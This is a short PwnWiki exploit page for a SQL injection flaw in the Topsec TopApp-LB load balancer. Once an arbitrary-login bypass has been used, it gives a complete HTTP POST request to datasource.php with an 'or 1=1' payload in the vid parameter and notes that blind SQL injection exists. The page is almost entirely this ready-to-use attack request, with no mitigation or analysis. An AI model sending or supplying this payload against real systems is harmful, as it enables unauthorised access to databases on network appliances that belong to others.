Topsec load balancing TopApp-LB Sql injection vulnerability

From PwnWiki
Revision as of 10:08, 24 June 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> ==Exploit== Use [https://www.pwnwiki.org/index.php?title=%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%B2%A0%E8%BC%89%E5%9D%87%E8%A1%A1TopApp-LB%E4%BB%BB%E6%84%8F%E7%99%BB%E...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English

Exploit

Use TOPSEC load balancing TopApp-LB arbitrary login Enter the background and submit the following data package: 

POST /acc/clsf/report/datasource.php HTTP/1.1
Host: 
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

t=l&e=0&s=t&l=1&vid=2147483647 or 1=1&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

There are blind SQL injections.

Retrieved from "https://pwnwiki.com/index.php?title=天融信負載均衡TopApp-LB_Sql注入漏洞/en&oldid=5758"